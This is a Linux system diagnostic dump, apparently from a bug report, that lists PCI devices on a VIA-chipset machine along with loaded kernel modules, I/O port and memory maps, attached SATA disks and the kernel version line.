Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:00.1 Host bridge: VIA Technologies, Inc. CN700/VN800/P4M800CE/Pro Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.2 Host bridge: VIA Technologies, Inc. CN700/VN800/P4M800CE/Pro Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.3 Host bridge: VIA Technologies, Inc. PT890 Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.4 Host bridge: VIA Technologies, Inc. CN700/VN800/P4M800CE/Pro Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.7 Host bridge: VIA Technologies, Inc. CN700/VN800/P4M800CE/Pro Host Bridge Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: fb000000-fcffffff Prefetchable memory behind bridge: f4000000-f7ffffff Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR+ &lt;PERR+ BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [70] Power Management version 2 Flags: PMEClk- DSI- D1+ D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:08.0 RAID bus controller: Silicon Image, Inc. SiI 3124 PCI-X Serial ATA Controller (rev 02) Subsystem: Silicon Image, Inc. Unknown device 7124 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 20 Region 0: Memory at fdfff000 (64-bit, non-prefetchable) [size=128] Region 2: Memory at fdff0000 (64-bit, non-prefetchable) [size=32K] Region 4: I/O ports at ff00 [size=16] [virtual] Expansion ROM at 40000000 [disabled] [size=512K] Capabilities: [64] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=1 PME- Capabilities: [40] PCI-X non-bridge device Command: DPERE- ERO+ RBC=512 OST=12 Status: Dev=ff:1f.0 64bit+ 133MHz+ SCD- USC- DC=simple DMMRBC=2048 DMOST=12 DMCRS=128 RSCEM- 266MHz- 533MHz- Capabilities: [54] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0 Enable- Address: 0000000000000000 Data: 0000 00:0c.0 FireWire (IEEE 1394): Agere Systems FW323 (rev 61) (prog-if 10 [OHCI]) Subsystem: Agere Systems FW323 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (3000ns min, 6000ns max), Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 19 Region 0: Memory at fdffe000 (32-bit, non-prefetchable) [size=4K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 00:0d.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) Subsystem: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (8000ns min, 16000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 16 Region 0: I/O ports at ee00 [size=256] Region 1: Memory at fdffd000 (32-bit, non-prefetchable) [size=256] [virtual] Expansion ROM at 40080000 [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0e.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet (rev 10) Subsystem: Realtek Semiconductor Co., Ltd. RTL-8169 Gigabit Ethernet Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 (8000ns min, 16000ns max), Cache Line Size: 32 bytes Interrupt: pin A routed to IRQ 17 Region 0: I/O ports at f000 [size=256] Region 1: Memory at fdffc000 (32-bit, non-prefetchable) [size=256] [virtual] Expansion ROM at 400a0000 [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0-,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0f.0 IDE interface: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller (rev 80) (prog-if 8f [Master SecP SecO PriP PriO]) Subsystem: VIA Technologies, Inc. VIA VT6420 SATA RAID Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64 Interrupt: pin B routed to IRQ 18 Region 0: I/O ports at fe00 [size=8] Region 1: I/O ports at fd00 [size=4] Region 2: I/O ports at fc00 [size=8] Region 3: I/O ports at fb00 [size=4] Region 4: I/O ports at fa00 [size=16] Region 5: I/O ports at f200 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:0f.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Subsystem: VIA Technologies, Inc. VT82C586/B/VT82C686/A/B/VT8233/A/C/VT8235 PIPC Bus Master IDE Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 18 Region 0: [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [size=8] Region 1: [virtual] Memory at 000003f0 (type 3, non-prefetchable) [size=1] Region 2: [virtual] Memory at 00000170 (32-bit, non-prefetchable) [size=8] Region 3: [virtual] Memory at 00000370 (type 3, non-prefetchable) [size=1] Region 4: I/O ports at f900 [size=16] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 19 Region 4: I/O ports at f800 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 19 Region 4: I/O ports at f700 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at f600 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.3 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 81) (prog-if 00 [UHCI]) Subsystem: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 19 Region 4: I/O ports at f500 [size=32] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:10.4 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 86) (prog-if 20 [EHCI]) Subsystem: VIA Technologies, Inc. USB 2.0 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 64, Cache Line Size: 64 bytes Interrupt: pin C routed to IRQ 19 Region 0: Memory at fdffb000 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=375mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME+ 00:11.0 ISA bridge: VIA Technologies, Inc. VT8237 ISA bridge [KT600/K8T800/K8T890 South] Subsystem: VIA Technologies, Inc. DFI KT600-AL / Soltek SL-B9D-FGR Motherboard Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping+ SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 60) Subsystem: Avance Logic Inc. Unknown device 4760 Control: I/O+ Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin C routed to IRQ 16 Region 0: I/O ports at ec00 [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 01:00.0 VGA compatible controller: VIA Technologies, Inc. UniChrome Pro IGP (rev 01) (prog-if 00 [VGA controller]) Subsystem: VIA Technologies, Inc. UniChrome Pro IGP Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 (500ns min) Interrupt: pin A routed to IRQ 5 Region 0: Memory at f4000000 (32-bit, prefetchable) [size=64M] Region 1: Memory at fb000000 (32-bit, non-prefetchable) [size=16M] [virtual] Expansion ROM at fc000000 [disabled] [size=64K] Capabilities: [60] Power Management version 2 Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [70] AGP version 3.0 Status: RQ=256 Iso- ArqSz=0 Cal=7 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3+ Rate=x4,x8 Command: RQ=1 ArqSz=0 Cal=0 SBA+ AGP- GART64- 64bit- FW- Rate=&lt;none&gt; ______________________________________________________ /proc/modules: _______________________________________________________ xts 2880 3 - Live 0xf8fb9000 usb_storage 79616 0 - Live 0xf8fd4000 lrw 3264 0 - Live 0xf8f28000 ip6table_filter 1984 0 - Live 0xf8f2e000 sit 8228 0 - Live 0xf8f2a000 tunnel4 2760 1 sit, Live 0xf8f09000 cls_fw 4224 4 - Live 0xf8f10000 sch_hfsc 16576 1 - Live 0xf8f30000 iptable_raw 1728 0 - Live 0xf8f0b000 xt_comment 1408 0 - Live 0xf8f0e000 xt_policy 3456 0 - Live 0xf8ef4000 ipt_ULOG 7044 0 - Live 0xf8f06000 ipt_TTL 1792 0 - Live 0xf8f01000 ipt_ttl 1408 0 - Live 0xf8eff000 ipt_TOS 1664 0 - Live 0xf8efd000 ipt_tos 1280 2 - Live 0xf8efb000 ipt_SAME 1728 0 - Live 0xf8ef9000 ipt_REJECT 3392 4 - Live 0xf8ee9000 ipt_REDIRECT 1536 0 - Live 0xf8ef2000 ipt_recent 7256 0 - Live 0xf8ef6000 ipt_owner 1536 4 - Live 0xf8ef0000 ipt_NETMAP 1536 0 - Live 0xf8eeb000 ipt_MASQUERADE 2432 1 - Live 0xf8ea6000 ipt_LOG 5376 22 - Live 0xf8eed000 ipt_iprange 1472 0 - Live 0xf8ee7000 ipt_ECN 2304 0 - Live 0xf8ee5000 ipt_ecn 1792 0 - Live 0xf8ea8000 ipt_CLUSTERIP 6084 0 - Live 0xf8e97000 ipt_ah 1472 0 - Live 0xf8ea4000 ipt_addrtype 1408 0 - Live 0xf8e9e000 nf_nat_tftp 1344 0 - Live 0xf8e9c000 nf_nat_snmp_basic 8964 0 - Live 0xf8ea0000 nf_nat_sip 3904 0 - Live 0xf8e9a000 nf_nat_pptp 2752 0 - Live 0xf8e8e000 nf_nat_proto_gre 2116 1 nf_nat_pptp, Live 0xf8e95000 nf_nat_irc 1984 0 - Live 0xf8e90000 nf_nat_h323 6144 0 - Live 0xf8e92000 nf_nat_ftp 2560 0 - Live 0xf8e6f000 nf_nat_amanda 1664 0 - Live 0xf8e8c000 ts_kmp 1664 5 - Live 0xf8e71000 nf_conntrack_amanda 3520 1 nf_nat_amanda, Live 0xf8e8a000 nf_conntrack_tftp 3924 1 nf_nat_tftp, Live 0xf8e61000 nf_conntrack_sip 7124 1 nf_nat_sip, Live 0xf8e87000 nf_conntrack_proto_sctp 7304 0 - Live 0xf8e69000 nf_conntrack_pptp 5184 1 nf_nat_pptp, Live 0xf8e6c000 nf_conntrack_proto_gre 4032 1 nf_conntrack_pptp, Live 0xf8e53000 nf_conntrack_netlink 23552 0 - Live 0xf8e80000 nf_conntrack_netbios_ns 2176 0 - Live 0xf8e5f000 nf_conntrack_irc 4952 1 nf_nat_irc, Live 0xf8e66000 nf_conntrack_h323 46812 1 nf_nat_h323, Live 0xf8e73000 ipv6 232580 40 sit,nf_conntrack_h323, Live 0xf8eab000 nf_conntrack_ftp 6880 1 nf_nat_ftp, Live 0xf8e63000 xt_tcpmss 1792 0 - Live 0xf8e5d000 xt_pkttype 1472 4 - Live 0xf8e5b000 xt_physdev 2320 0 - Live 0xf8e59000 xt_NFQUEUE 1536 0 - Live 0xf8e57000 xt_NFLOG 1664 0 - Live 0xf8e55000 xt_multiport 2880 8 - Live 0xf8e3d000 xt_MARK 1856 29 - Live 0xf8e51000 xt_mark 1472 3 - Live 0xf8e4f000 xt_mac 1472 0 - Live 0xf8e4d000 xt_limit 1984 0 - Live 0xf8e4b000 xt_length 1536 2 - Live 0xf8e49000 xt_helper 1920 0 - Live 0xf8e3f000 xt_hashlimit 7692 0 - Live 0xf8e46000 ip6_tables 11080 2 ip6table_filter,xt_hashlimit, Live 0xf8e42000 xt_dccp 2628 0 - Live 0xf8e1a000 xt_conntrack 2112 3 - Live 0xf8e3b000 xt_CONNMARK 2304 2 - Live 0xf8e39000 xt_connmark 1792 0 - Live 0xf8e37000 xt_CLASSIFY 1472 0 - Live 0xf8e35000 xt_tcpudp 2752 77 - Live 0xf8e16000 xt_state 1856 33 - Live 0xf8e18000 iptable_nat 5700 1 - Live 0xf8dfa000 nf_nat 15084 14 ipt_SAME,ipt_REDIRECT,ipt_NETMAP,ipt_MASQUERADE,nf_nat_tftp,nf_nat_sip,nf_nat_pptp,nf_nat_proto_gre,nf_nat_irc,nf_nat_h323,nf_nat_ftp,nf_nat_amanda,nf_conntrack_netlink,iptable_nat, Live 0xf8e21000 nf_conntrack_ipv4 12936 40 iptable_nat, Live 0xf8e1c000 nf_conntrack 51684 29 ipt_MASQUERADE,ipt_CLUSTERIP,nf_nat_tftp,nf_nat_snmp_basic,nf_nat_sip,nf_nat_pptp,nf_nat_irc,nf_nat_h323,nf_nat_ftp,nf_nat_amanda,nf_conntrack_amanda,nf_conntrack_tftp,nf_conntrack_sip,nf_conntrack_proto_sctp,nf_conntrack_pptp,nf_conntrack_proto_gre,nf_conntrack_netlink,nf_conntrack_netbios_ns,nf_conntrack_irc,nf_conntrack_h323,nf_conntrack_ftp,xt_helper,xt_conntrack,xt_CONNMARK,xt_connmark,xt_state,iptable_nat,nf_nat,nf_conntrack_ipv4, Live 0xf8e27000 iptable_mangle 2048 1 - Live 0xf8e08000 nfnetlink 3352 1 nf_conntrack_netlink, Live 0xf8e01000 iptable_filter 2112 1 - Live 0xf8dff000 ip_tables 9992 4 iptable_raw,iptable_nat,iptable_mangle,iptable_filter, Live 0xf8e12000 x_tables 10756 44 xt_comment,xt_policy,ipt_ULOG,ipt_TTL,ipt_ttl,ipt_TOS,ipt_tos,ipt_SAME,ipt_REJECT,ipt_REDIRECT,ipt_recent,ipt_owner,ipt_NETMAP,ipt_MASQUERADE,ipt_LOG,ipt_iprange,ipt_ECN,ipt_ecn,ipt_CLUSTERIP,ipt_ah,ipt_addrtype,xt_tcpmss,xt_pkttype,xt_physdev,xt_NFQUEUE,xt_NFLOG,xt_multiport,xt_MARK,xt_mark,xt_mac,xt_limit,xt_length,xt_helper,xt_hashlimit,ip6_tables,xt_dccp,xt_conntrack,xt_CONNMARK,xt_connmark,xt_CLASSIFY,xt_tcpudp,xt_state,iptable_nat,ip_tables, Live 0xf8e04000 w83781d 28460 0 - Live 0xf8e0a000 hwmon_vid 2560 1 w83781d, Live 0xf8dfd000 ppdev 7428 0 - Live 0xf8a7f000 lp 8452 0 - Live 0xf8a7b000 parport_pc 34340 1 - Live 0xf8a55000 parport 30472 3 ppdev,lp,parport_pc, Live 0xf8a72000 ppp_generic 21844 0 - Live 0xf8a6b000 rtc_cmos 6560 0 - Live 0xf8a3c000 psmouse 35472 0 - Live 0xf8a61000 serio_raw 4996 0 - Live 0xf8a39000 i2c_viapro 6996 0 - Live 0xf8a30000 i2c_core 18320 2 w83781d,i2c_viapro, Live 0xf8a33000 ohci1394 27696 0 - Live 0xf8a0f000 ieee1394 76920 1 ohci1394, Live 0xf8a41000 via_agp 7872 1 - Live 0xf88f7000 agpgart 26192 1 via_agp, Live 0xf8a18000 evdev 8384 0 - Live 0xf8a0b000 thermal 12444 0 - Live 0xf8980000 processor 22256 2 thermal, Live 0xf8a04000 fan 3268 0 - Live 0xf88e4000 button 5968 0 - Live 0xf8977000 snd_via82xx 20948 0 - Live 0xf8928000 snd_ac97_codec 94628 1 snd_via82xx, Live 0xf8985000 snd_mpu401_uart 6016 1 snd_via82xx, Live 0xf8925000 snd_rawmidi 17824 1 snd_mpu401_uart, Live 0xf8960000 snd_seq_oss 27904 0 - Live 0xf892f000 snd_seq_midi_event 5824 1 snd_seq_oss, Live 0xf8916000 snd_seq 42512 4 snd_seq_oss,snd_seq_midi_event, Live 0xf8954000 snd_seq_device 6284 3 snd_rawmidi,snd_seq_oss,snd_seq, Live 0xf88fb000 snd_pcm_oss 35936 0 - Live 0xf894a000 snd_pcm 65352 3 snd_via82xx,snd_ac97_codec,snd_pcm_oss, Live 0xf8939000 snd_timer 17476 2 snd_seq,snd_pcm, Live 0xf8910000 snd_page_alloc 7496 2 snd_via82xx,snd_pcm, Live 0xf88f1000 snd_mixer_oss 13696 1 snd_pcm_oss, Live 0xf890b000 snd 42724 11 snd_via82xx,snd_ac97_codec,snd_mpu401_uart,snd_rawmidi,snd_seq_oss,snd_seq,snd_seq_device,snd_pcm_oss,snd_pcm,snd_timer,snd_mixer_oss, Live 0xf8919000 soundcore 5408 1 snd, Live 0xf88f4000 ac97_bus 1600 1 snd_ac97_codec, Live 0xf88e6000 slhc 5120 1 ppp_generic, Live 0xf88ee000 bridge 46680 0 - Live 0xf88fe000 llc 5396 1 bridge, Live 0xf88eb000 tun 8064 2 - Live 0xf88e8000 pata_acpi 4736 0 - Live 0xf882b000 sata_sil24 13060 3 - Live 0xf8814000 pdc202xx_old 6016 0 [permanent], Live 0xf8820000 sata_via 7812 0 - Live 0xf881d000 pata_via 8836 0 - Live 0xf8819000 ___________________________________________ /proc/ioports: ___________________________________________ 0000-001f : dma1 0020-0021 : pic1 0022-0022 : ACPI PM2_CNT_BLK 0040-0043 : timer0 0050-0053 : timer1 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:0f.1 01f0-01f7 : 0000:00:0f.1 01f0-01f7 : ide0 0294-0297 : pnp 00:03 02e8-02ef : serial 02f8-02ff : serial 0376-0376 : 0000:00:0f.1 0378-037a : parport0 037b-037f : parport0 03c0-03df : vga+ 03e8-03ef : serial 03f6-03f6 : 0000:00:0f.1 03f6-03f6 : ide0 03f8-03ff : serial 0400-047f : pnp 00:02 0400-0403 : ACPI PM1a_EVT_BLK 0404-0405 : ACPI PM1a_CNT_BLK 0408-040b : ACPI PM_TMR 0410-0415 : ACPI CPU throttle 0420-0423 : ACPI GPE0_BLK 04d0-04d1 : pnp 00:03 0500-050f : pnp 00:02 0500-0507 : vt596_smbus 0778-077a : parport0 0cf8-0cff : PCI conf1 d000-dfff : PCI Bus #01 ec00-ecff : 0000:00:11.5 ec00-ecff : VIA8237 ee00-eeff : 0000:00:0d.0 ee00-eeff : r8169 f000-f0ff : 0000:00:0e.0 f000-f0ff : r8169 f200-f2ff : 0000:00:0f.0 f200-f2ff : sata_via f500-f51f : 0000:00:10.3 f500-f51f : uhci_hcd f600-f61f : 0000:00:10.2 f600-f61f : uhci_hcd f700-f71f : 0000:00:10.1 f700-f71f : uhci_hcd f800-f81f : 0000:00:10.0 f800-f81f : uhci_hcd f900-f90f : 0000:00:0f.1 f900-f907 : ide0 fa00-fa0f : 0000:00:0f.0 fa00-fa0f : libata fb00-fb03 : 0000:00:0f.0 fb00-fb03 : libata fc00-fc07 : 0000:00:0f.0 fc00-fc07 : libata fd00-fd03 : 0000:00:0f.0 fd00-fd03 : libata fe00-fe07 : 0000:00:0f.0 fe00-fe07 : libata ff00-ff0f : 0000:00:08.0 _________________________________________________________ _________________________________________________________ /proc/iomem: _________________________________________________________ 00000000-000997ff : System RAM 00099800-0009ffff : reserved 000a0000-000bffff : Video RAM area 000c0000-000cf1ff : Video ROM 000d0000-000d35ff : Adapter ROM 000d3600-000d3fff : pnp 00:00 000f0000-000fffff : System ROM 00100000-3eedffff : System RAM 00100000-00400bff : Kernel code 00400c00-004fec7b : Kernel data 0053c000-0059064b : Kernel bss 3eee0000-3eee2fff : ACPI Non-volatile Storage 3eee3000-3eeeffff : ACPI Tables 3eef0000-3eefffff : reserved 40000000-4007ffff : 0000:00:08.0 40080000-4009ffff : 0000:00:0d.0 400a0000-400bffff : 0000:00:0e.0 f4000000-f7ffffff : PCI Bus #01 f4000000-f7ffffff : 0000:01:00.0 f8000000-f9ffffff : 0000:00:00.0 fb000000-fcffffff : PCI Bus #01 fb000000-fbffffff : 0000:01:00.0 fc000000-fc00ffff : 0000:01:00.0 fdff0000-fdff7fff : 0000:00:08.0 fdff0000-fdff7fff : sata_sil24 fdffb000-fdffb0ff : 0000:00:10.4 fdffb000-fdffb0ff : ehci_hcd fdffc000-fdffc0ff : 0000:00:0e.0 fdffc000-fdffc0ff : r8169 fdffd000-fdffd0ff : 0000:00:0d.0 fdffd000-fdffd0ff : r8169 fdffe000-fdffefff : 0000:00:0c.0 fdffe000-fdffe7ff : ohci1394 fdfff000-fdfff07f : 0000:00:08.0 fdfff000-fdfff07f : sata_sil24 fec00000-fec00fff : reserved fee00000-fee00fff : reserved fff80000-fffeffff : pnp 00:00 ffff0000-ffffffff : reserved ___________________________________________________________ /proc/scsi/scsi: ___________________________________________________________ Attached devices: Host: scsi3 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3160023AS Rev: 3.05 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi4 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3250620NS Rev: 3.AE Type: Direct-Access ANSI SCSI revision: 05 Host: scsi5 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: ST3160023AS Rev: 3.05 Type: Direct-Access ANSI SCSI revision: 05 Host: scsi2 Channel: 00 Id: 00 Lun: 00 Vendor: ATA Model: FUJITSU MHT2060B Rev: 4000 Type: Direct-Access ANSI SCSI revision: 05 Software Environment: Linux servi 2.6.24.2 #2 Mon Feb 18 13:02:57 CET 2008 i686 VIA Esther processor 